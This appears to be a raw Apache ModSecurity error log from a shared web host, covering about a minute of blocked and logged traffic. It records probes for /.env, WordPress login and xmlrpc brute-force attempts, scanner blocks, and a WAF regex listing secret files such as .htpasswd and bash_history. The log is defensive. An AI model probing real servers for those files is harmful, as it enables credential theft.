[Tue May 26 13:22:36.319347 2026] [security2:error] [pid 512344:tid 512503] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRQ8bElyei4S77DQfrCQAAAB0"]
[Tue May 26 13:22:38.540126 2026] [security2:error] [pid 512745:tid 512928] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRRnKSB_s2CvZg7xNRkAAAAT8"]
[Tue May 26 13:22:40.441891 2026] [security2:error] [pid 512344:tid 512474] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRSMbElyei4S77DQfrOwAAAAA"]
[Tue May 26 13:22:41.105282 2026] [ssl:error] [pid 512745:tid 512887] [client 3.233.59.216:3028] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname cpcalendars.rbkgroups.co.in provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 13:22:43.267642 2026] [security2:error] [pid 512745:tid 512935] [client 68.183.88.172:48560] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "ivwellnessresources.org"] [uri "/"] [unique_id "ahVRS3KSB_s2CvZg7xNR5gAAAUY"]
[Tue May 26 13:22:43.330642 2026] [access_compat:error] [pid 512745:tid 512916] [client 35.216.144.195:53340] AH01797: client denied by server configuration: /var/www/html/server-status
[Tue May 26 13:22:43.480010 2026] [security2:error] [pid 512745:tid 512931] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRS3KSB_s2CvZg7xNR4wAAAUI"]
[Tue May 26 13:22:43.560093 2026] [security2:error] [pid 512745:tid 512816] [remote 51.91.98.45:43174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVRS3KSB_s2CvZg7xNR6gABgUY"]
[Tue May 26 13:22:45.009808 2026] [security2:error] [pid 512745:tid 512902] [client 35.216.144.195:53354] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/.env"] [unique_id "ahVRTXKSB_s2CvZg7xNSAAAAASU"]
[Tue May 26 13:22:46.853146 2026] [security2:error] [pid 512344:tid 512514] [client 35.216.144.195:53384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.144.216.35.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.198.65"] [uri "/info.php"] [unique_id "ahVRTsbElyei4S77DQfrgwAAACg"]
[Tue May 26 13:22:47.335679 2026] [security2:error] [pid 512745:tid 512992] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRTnKSB_s2CvZg7xNSHgAAAX8"]
[Tue May 26 13:22:47.337058 2026] [ssl:error] [pid 512745:tid 512817] [remote 65.108.99.186:55762] AH02032: Hostname blog.jhonweb.com provided via SNI and hostname www.jhonweb.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://blog.jhonweb.com/que-diferencias-hay-entre-fat32-ntfs-y-exfat/
[Tue May 26 13:22:50.320987 2026] [security2:error] [pid 512344:tid 512530] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRUcbElyei4S77DQfrogAAADg"]
[Tue May 26 13:22:52.554786 2026] [security2:error] [pid 512344:tid 512534] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRVMbElyei4S77DQfrwAAAADw"]
[Tue May 26 13:22:53.861565 2026] [security2:error] [pid 512745:tid 512791] [remote 51.91.98.45:48550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVRVXKSB_s2CvZg7xNSiAABGi0"]
[Tue May 26 13:22:54.030164 2026] [security2:error] [pid 512745:tid 512889] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRVXKSB_s2CvZg7xNShAAAARg"]
[Tue May 26 13:22:55.095263 2026] [security2:error] [pid 512745:tid 513000] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRVnKSB_s2CvZg7xNSkgAAAYc"]
[Tue May 26 13:22:57.224476 2026] [security2:error] [pid 512344:tid 512502] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRWMbElyei4S77DQfsCgAAABw"]
[Tue May 26 13:22:57.329472 2026] [security2:error] [pid 512745:tid 512939] [client 176.65.139.232:56740] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jobs.ucdc.co.in"] [uri "/.env"] [unique_id "ahVRWXKSB_s2CvZg7xNSwAAAAUo"]
[Tue May 26 13:22:58.068061 2026] [security2:error] [pid 512745:tid 512945] [client 14.248.173.220:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRWXKSB_s2CvZg7xNSyAAAAVA"]
[Tue May 26 13:22:59.493234 2026] [security2:error] [pid 512745:tid 512957] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRW3KSB_s2CvZg7xNS2QAAAVw"]
[Tue May 26 13:23:02.000787 2026] [security2:error] [pid 512344:tid 512546] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRXcbElyei4S77DQfsQgAAAEg"]
[Tue May 26 13:23:03.408024 2026] [security2:error] [pid 512344:tid 512385] [remote 74.7.241.58:44540] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVRX8bElyei4S77DQfsYgAACyg"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:23:04.334683 2026] [security2:error] [pid 512344:tid 512474] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRX8bElyei4S77DQfsagAAAAA"]
[Tue May 26 13:23:04.620828 2026] [security2:error] [pid 512344:tid 512392] [remote 45.250.255.226:54508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVRYMbElyei4S77DQfscwAAMi8"]
[Tue May 26 13:23:05.978137 2026] [security2:error] [pid 512344:tid 512546] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRYcbElyei4S77DQfsiwAAAEg"]
[Tue May 26 13:23:08.526899 2026] [security2:error] [pid 512344:tid 512398] [remote 47.251.53.97:56210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.53.251.47.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVRZMbElyei4S77DQfswwAAQjU"]
[Tue May 26 13:23:08.885983 2026] [security2:error] [pid 512344:tid 512576] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRZMbElyei4S77DQfsxwAAAGY"]
[Tue May 26 13:23:10.647225 2026] [security2:error] [pid 512344:tid 512562] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRZsbElyei4S77DQfs8wAAAFg"]
[Tue May 26 13:23:10.648508 2026] [security2:error] [pid 512344:tid 512586] [client 114.119.134.192:23881] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/shop-2/privacy-policy/viagrasildenafilbsl.com"] [unique_id "ahVRZsbElyei4S77DQfs-QAAAHA"], referer: https://www.anujtradingco.com/shop-2/privacy-policy/viagrasildenafilbsl.com
[Tue May 26 13:23:11.631524 2026] [security2:error] [pid 512344:tid 512499] [client 114.119.133.192:55703] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.aastha-enterprises.com"] [uri "/index.html"] [unique_id "ahVRZ8bElyei4S77DQftDwAAABk"], referer: http://www.aastha-enterprises.com/
[Tue May 26 13:23:13.359445 2026] [security2:error] [pid 512745:tid 512915] [client 49.43.202.168:59491] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.202.43.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/xmlrpc.php"] [unique_id "ahVRaXKSB_s2CvZg7xNTZAAAATI"]
[Tue May 26 13:23:13.359596 2026] [security2:error] [pid 512745:tid 512915] [client 49.43.202.168:59491] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kardashevtechnologies.com"] [uri "/xmlrpc.php"] [unique_id "ahVRaXKSB_s2CvZg7xNTZAAAATI"]
[Tue May 26 13:23:13.987128 2026] [security2:error] [pid 512745:tid 512887] [client 74.7.241.130:57916] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahVRaXKSB_s2CvZg7xNTYgABFlE"]
[Tue May 26 13:23:13.987168 2026] [security2:error] [pid 512745:tid 512887] [client 74.7.241.130:57916] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahVRaXKSB_s2CvZg7xNTYgABFlE"]
[Tue May 26 13:23:14.071158 2026] [security2:error] [pid 512745:tid 512990] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRaXKSB_s2CvZg7xNTcQAAAX0"]
[Tue May 26 13:23:14.655141 2026] [security2:error] [pid 512344:tid 512475] [client 74.7.241.130:57932] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahVRasbElyei4S77DQftNwAAAUs"], referer: https://www.kingsclubmembership.com/robots.txt
[Tue May 26 13:23:14.778514 2026] [security2:error] [pid 512344:tid 512509] [client 74.7.244.41:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.kingsclubbanquet.com"] [uri "/index.php"] [unique_id "ahVRacbElyei4S77DQftJwAAACM"]
[Tue May 26 13:23:14.778551 2026] [security2:error] [pid 512344:tid 512509] [client 74.7.244.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kingsclubbanquet.com"] [uri "/index.php"] [unique_id "ahVRacbElyei4S77DQftJwAAACM"]
[Tue May 26 13:23:14.779357 2026] [security2:error] [pid 512745:tid 512902] [client 74.7.244.41:57010] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.kingsclubbanquet.com"] [uri "/robots.txt"] [unique_id "ahVRaXKSB_s2CvZg7xNTZQABJVU"]
[Tue May 26 13:23:15.290676 2026] [security2:error] [pid 512344:tid 512501] [client 123.16.146.60:55372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.146.16.123.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVRasbElyei4S77DQftSAAAABs"], referer: https://www.cagmedya.com/
[Tue May 26 13:23:15.654973 2026] [security2:error] [pid 512745:tid 512958] [client 74.7.228.41:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "kingsclubbanquet.com"] [uri "/index.php"] [unique_id "ahVRa3KSB_s2CvZg7xNTigAAAV0"]
[Tue May 26 13:23:15.655816 2026] [security2:error] [pid 512745:tid 512891] [client 74.7.228.41:59322] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "kingsclubbanquet.com"] [uri "/robots.txt"] [unique_id "ahVRa3KSB_s2CvZg7xNThwABGnw"]
[Tue May 26 13:23:15.666545 2026] [security2:error] [pid 512344:tid 512598] [client 74.7.244.41:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "kingsclubbanquet.com"] [uri "/index.php"] [unique_id "ahVRa8bElyei4S77DQftSQAAAHw"], referer: https://www.kingsclubbanquet.com/robots.txt
[Tue May 26 13:23:15.667178 2026] [security2:error] [pid 512745:tid 512889] [client 74.7.244.41:57012] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "kingsclubbanquet.com"] [uri "/robots.txt"] [unique_id "ahVRa3KSB_s2CvZg7xNTiwABGH4"], referer: https://www.kingsclubbanquet.com/robots.txt
[Tue May 26 13:23:15.819828 2026] [security2:error] [pid 512344:tid 512546] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRa8bElyei4S77DQftUAAAAEg"]
[Tue May 26 13:23:15.887304 2026] [security2:error] [pid 512745:tid 512964] [client 74.7.175.183:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.kingsclub.in"] [uri "/index.php"] [unique_id "ahVRaXKSB_s2CvZg7xNTXwABY1M"]
[Tue May 26 13:23:15.887364 2026] [security2:error] [pid 512745:tid 512964] [client 74.7.175.183:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kingsclub.in"] [uri "/index.php"] [unique_id "ahVRaXKSB_s2CvZg7xNTXwABY1M"]
[Tue May 26 13:23:16.205598 2026] [autoindex:error] [pid 512344:tid 512560] [client 15.204.183.221:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.juniorwoodies.com/
[Tue May 26 13:23:16.808824 2026] [security2:error] [pid 512745:tid 512915] [client 74.7.175.183:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVRbHKSB_s2CvZg7xNTpwABMgA"], referer: https://www.kingsclub.in/robots.txt
[Tue May 26 13:23:18.331277 2026] [security2:error] [pid 512344:tid 512536] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRbcbElyei4S77DQftegAAAD4"]
[Tue May 26 13:23:19.610269 2026] [security2:error] [pid 512745:tid 512979] [client 185.191.171.5:49408] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahVRb3KSB_s2CvZg7xNT5QAAAXI"]
[Tue May 26 13:23:19.610452 2026] [security2:error] [pid 512745:tid 512979] [client 185.191.171.5:49408] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahVRb3KSB_s2CvZg7xNT5QAAAXI"]
[Tue May 26 13:23:20.566556 2026] [security2:error] [pid 512745:tid 512887] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRcHKSB_s2CvZg7xNT8AAAARY"]
[Tue May 26 13:23:21.002767 2026] [security2:error] [pid 512745:tid 512955] [client 74.7.241.169:49800] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.pgcsi.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVRcHKSB_s2CvZg7xNUBAABWmk"]
[Tue May 26 13:23:22.205815 2026] [core:error] [pid 512344:tid 512507] [client 105.214.24.144:33910] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:23:22.205834 2026] [core:error] [pid 512344:tid 512507] [client 105.214.24.144:33910] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:23:23.375921 2026] [security2:error] [pid 512745:tid 512924] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRcnKSB_s2CvZg7xNULwAAATs"]
[Tue May 26 13:23:26.115586 2026] [security2:error] [pid 512745:tid 513000] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRdXKSB_s2CvZg7xNUXgAAAYc"]
[Tue May 26 13:23:27.634753 2026] [security2:error] [pid 512344:tid 512584] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRd8bElyei4S77DQfuHgAAAG4"]
[Tue May 26 13:23:29.371178 2026] [security2:error] [pid 512745:tid 512893] [client 49.47.152.118:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVReHKSB_s2CvZg7xNUngAAARw"]
[Tue May 26 13:23:29.965341 2026] [security2:error] [pid 512745:tid 512899] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVReXKSB_s2CvZg7xNUrQAAASI"]
[Tue May 26 13:23:32.255927 2026] [security2:error] [pid 512745:tid 512951] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRe3KSB_s2CvZg7xNU4AAAAVY"]
[Tue May 26 13:23:32.629124 2026] [security2:error] [pid 512745:tid 512961] [client 176.65.139.238:55796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pgcsi.svijaykumar.in"] [uri "/.env"] [unique_id "ahVRfHKSB_s2CvZg7xNU9QAAAWA"]
[Tue May 26 13:23:34.765728 2026] [security2:error] [pid 512344:tid 512601] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRfsbElyei4S77DQfulQAAAH8"]
